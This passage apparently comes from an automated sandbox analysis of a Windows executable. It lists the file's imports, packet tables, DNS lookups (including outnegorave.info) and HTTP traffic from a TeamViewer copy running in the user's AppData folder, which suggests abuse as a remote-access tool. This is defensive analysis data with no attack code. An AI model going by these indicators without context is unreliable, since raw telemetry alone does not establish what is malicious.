                                                                                                                      RT_MANIFEST0x513580x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.DLLCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 15, 2021 14:08:00.896482944 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.917491913 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.917788029 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.918462038 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.940159082 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.940284014 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.958070040 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:00.980880976 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.981093884 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.008373976 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.029356003 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.029424906 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.029478073 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.029532909 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.030750990 CEST4975280192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.035720110 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.051665068 CEST8049752185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.056746006 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.058818102 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.058862925 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.080029964 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.082326889 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.084237099 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.105293989 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.105370045 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.106717110 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.128108978 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.130171061 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.130367994 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.131237030 CEST4975380192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.133955002 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.152343035 CEST8049753185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.155005932 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.155142069 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.155966043 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.179565907 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.181721926 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.183722973 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.204659939 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.207657099 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.209389925 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.230426073 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.230473042 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.230581045 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.230953932 CEST4975480192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.237579107 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.251744032 CEST8049754185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.258640051 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.258778095 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.259424925 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.282213926 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.285140991 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.287225962 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.309426069 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.314063072 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.314114094 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.335100889 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.336735964 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.342247963 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.342295885 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.350913048 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.394808054 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.395001888 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.395808935 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.435075998 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.435647964 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.439027071 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.478888988 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.489496946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495162010 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495203018 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.542887926 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.542922020 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.544677973 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.544800043 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.584625006 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.585436106 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.587244987 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.623857975 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627022028 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627109051 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.627151966 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808274031 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.847999096 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.278857946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336889029 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336922884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336926937 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.376280069 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.376321077 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377862930 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377959967 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.378012896 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.422226906 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.731400013 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731461048 CEST4975680192.168.2.637.252.232.109

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 15, 2021 14:07:55.339137077 CEST5838453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:55.366976023 CEST53583848.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:07:59.058855057 CEST6026153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:59.094980001 CEST53602618.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:07:59.112746000 CEST5606153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:59.150213003 CEST53560618.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.839952946 CEST5833653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:00.878603935 CEST53583368.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.412535906 CEST5378153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST53537818.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:14.876324892 CEST5406453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:14.906733036 CEST53540648.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:15.979767084 CEST5281153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:16.009274006 CEST53528118.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:18.095195055 CEST5529953192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:18.122610092 CEST53552998.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:22.332706928 CEST6374553192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:22.384006977 CEST53637458.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:23.001681089 CEST5005553192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:23.072467089 CEST53500558.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:24.531429052 CEST6137453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:24.561456919 CEST53613748.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:24.859649897 CEST5033953192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:24.902987003 CEST53503398.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:25.034883976 CEST6330753192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:25.096126080 CEST53633078.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:26.477113962 CEST4969453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:26.555916071 CEST53496948.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:27.616777897 CEST5498253192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:27.647160053 CEST53549828.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:29.198575974 CEST5001053192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:29.230607986 CEST53500108.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:30.075391054 CEST6371853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:30.105350018 CEST53637188.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:31.662997007 CEST6211653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:31.703227997 CEST53621168.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:32.473421097 CEST6381653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:32.503563881 CEST53638168.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:36.936897039 CEST5501453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:36.968677998 CEST53550148.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:52.816452980 CEST6220853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:52.857124090 CEST53622088.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:14.727735996 CEST5757453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:09:14.763683081 CEST53575748.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:16.474416018 CEST5181853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:09:16.509351969 CEST53518188.8.8.8192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Sep 15, 2021 14:07:59.058855057 CEST192.168.2.68.8.8.80x281Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:07:59.112746000 CEST192.168.2.68.8.8.80xa930Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:00.839952946 CEST192.168.2.68.8.8.80x6a24Standard query (0)master1.teamviewer.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.412535906 CEST192.168.2.68.8.8.80x66a0Standard query (0)outnegorave.infoA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Sep 15, 2021 14:07:59.094980001 CEST8.8.8.8192.168.2.60x281Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:07:59.150213003 CEST8.8.8.8192.168.2.60xa930Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:00.878603935 CEST8.8.8.8192.168.2.60x6a24No error (0)master1.teamviewer.com185.188.32.1A (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST8.8.8.8192.168.2.60x66a0No error (0)outnegorave.info172.67.205.33A (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST8.8.8.8192.168.2.60x66a0No error (0)outnegorave.info104.21.77.64A (IP address)IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • outnegorave.info
                                                                                                                      • master1.teamviewer.com
                                                                                                                      • 37.252.232.109

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649758172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649834172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.649839172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      3192.168.2.649752185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:00.918462038 CEST925OUTGET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:00.940159082 CEST925INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 36 35
                                                                                                                      Data Ascii: $32172965
                                                                                                                      Sep 15, 2021 14:08:00.958070040 CEST926OUTGET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:00.980880976 CEST926INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.008373976 CEST926OUTGET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.029356003 CEST926INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 16
                                                                                                                      Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 1b 99 19 1b 1b
                                                                                                                      Data Ascii: $


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      4192.168.2.649753185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.058862925 CEST927OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.080029964 CEST927INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 36 39
                                                                                                                      Data Ascii: $32172969
                                                                                                                      Sep 15, 2021 14:08:01.084237099 CEST928OUTGET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.105293989 CEST928INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.106717110 CEST928OUTGET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.128108978 CEST929INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 9
                                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                      Data Ascii: $ '


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      5192.168.2.649754185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.155966043 CEST929OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.179565907 CEST929INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 37 33
                                                                                                                      Data Ascii: $32172973
                                                                                                                      Sep 15, 2021 14:08:01.183722973 CEST930OUTGET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.204659939 CEST930INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.209389925 CEST931OUTGET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.230426073 CEST931INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 9
                                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                      Data Ascii: $ '


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      6192.168.2.649755185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.259424925 CEST932OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.282213926 CEST932INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
